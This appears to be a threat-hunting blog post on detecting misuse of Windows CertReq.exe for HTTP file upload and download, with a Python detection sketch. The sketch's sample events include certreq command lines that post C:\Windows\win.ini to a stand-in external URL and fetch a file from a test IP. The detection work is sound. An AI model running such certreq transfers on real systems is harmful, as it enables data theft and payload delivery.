Threat Hunting Content: CertReq.exe Lolbin

Living off the Land binaries (Lolbins) are legitimate binaries that advanced adversaries often misuse to perform actions beyond their original purpose. Cybercriminals actively use them to download malware, to ensure persistence, for data exfiltration, for lateral movement, and more. Just yesterday we wrote about a rule that detects attacks of the Evil Corp group, which also uses Lolbins to deploy WastedLocker ransomware on the maximum number of systems in organizations.

CertReq.exe ships with Windows, and its intended use is to assist with the creation and installation of certificates. It is not among the Lolbins most heavily abused by cybercriminals, but it can be used to perform malicious actions without attracting the attention of security solutions. Cybercriminals can use CertReq.exe to upload and download small files: it can upload a file via HTTP POST, or download a file via HTTP POST and either save it to disk or display its contents. You can read more about CertReq.exe exploitation here.

Den Iuzvik developed and released a new threat hunting Sigma rule that detects possible file upload/download with CertReq.exe: https://tdm.socprime.com/tdm/info/BBbpPolVZpLp/SJcgLnMBQAH5UgbBoihF/?p=1
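The Sigma rule itself sits behind the link above. As an added illustration (not SOC Prime's rule and not Den Iuzvik's code), the snippet below shows the kind of hunting logic such a rule expresses, run over a handful of constructed Sysmon-style process-creation events. It flags certreq.exe only when the command line carries the documented `-Post` and `-config` options together with an HTTP(S) URL, which is the shape of the upload/download usage described above; a routine `-submit` against an internal CA is left alone. The sample events, the host names and the URLs are all made up for the example, and the assumption that this flag combination is rare in your environment is something to verify against your own baseline before alerting on it.

```python
import re

# Constructed Sysmon Event ID 1 style events for the example; none of this is real telemetry.
SAMPLE_EVENTS = [
    # Legitimate use: submitting a request to an internal enterprise CA.
    {"Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r'certreq -submit -config "CA01.corp.example\Corp-CA" C:\temp\request.req'},
    # Suspicious: POSTing a local file to an external URL (file upload).
    {"Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r'certreq -Post -config https://example.invalid/upload C:\Windows\win.ini'},
    # Suspicious: POST with an output path, i.e. the response is written to disk (file download).
    {"Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r'CertReq.exe -post -config http://192.0.2.10/ C:\temp\in.txt C:\temp\out.txt'},
    # Unrelated process, must never match.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\temp\notes.txt"},
]

# A URL scheme anywhere in the command line; certreq against a CA uses "CA\Name", not a URL.
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def is_certreq_transfer(event):
    """Return True when the event looks like certreq.exe being used as an HTTP transfer tool.

    Conditions (all case-insensitive, mirroring how a Sigma 'contains' selection behaves):
      * the image is certreq.exe,
      * the command line contains both -post and -config,
      * the command line contains an http:// or https:// URL.
    """
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith("\\certreq.exe"):
        return False
    low = cmd.lower()
    return "-post" in low and "-config" in low and URL_RE.search(cmd) is not None


def hunt(events):
    """Return the command lines of every event that matches the hunting logic."""
    return [e["CommandLine"] for e in events if is_certreq_transfer(e)]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print("suspicious certreq usage:", hit)
```

The two conditions that matter for precision are the image check and the URL check: matching on `-config` alone would also catch every legitimate certificate request an enterprise PKI generates, so the rule narrows to the POST-to-URL pattern that has no business reason on most workstations.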


The rule has translations for the following platforms:

SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, ELK Stack, RSA NetWitness, Sumo Logic, Graylog, Humio, LogPoint

EDR: Microsoft Defender ATP, Carbon Black, Elastic Endpoint


MITRE ATT&CK: 

Tactics: Command And Control

Techniques: Remote File Copy (T1105)


Ready to try out SOC Prime TDM? Sign up for free. Or join Threat Bounty Program to craft your own content and share it with the TDM community.